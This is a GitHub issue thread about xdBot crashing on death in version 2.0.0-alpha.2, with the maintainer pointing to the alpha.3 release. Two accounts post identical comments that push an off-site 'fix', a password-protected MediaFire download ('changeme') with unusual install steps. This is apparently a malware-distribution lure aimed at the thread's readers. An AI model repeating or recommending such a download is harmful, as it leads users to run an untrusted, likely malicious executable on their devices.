### ISSUE TITLE
Crash on Death

### ISSUE THREAD

**Issue by LoopterGD** [ZiLko/xdBot#140]
Hello, I play on mobile and when I tried botting a level it worked on one attempts, after I die the game crashes this only happens on version 2.0.0-alpha.2 the previous version did not have this problem. I saw someone else put the crash log so I'll put the crash log in here as well if that's useful!
[Crash 2024-08-31 00.08.15.dmp](https://github.com/user-attachments/files/16823760/Crash.2024-08-31.00.08.15.dmp)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by LumerGD120** [comment]
Ey same but not exactly it on crashes when i press restart button

**Comment by ZiLko** [comment]
https://github.com/ZiLko/xdBot/releases/tag/v2.0.0-alpha.3 hopefully fixes it
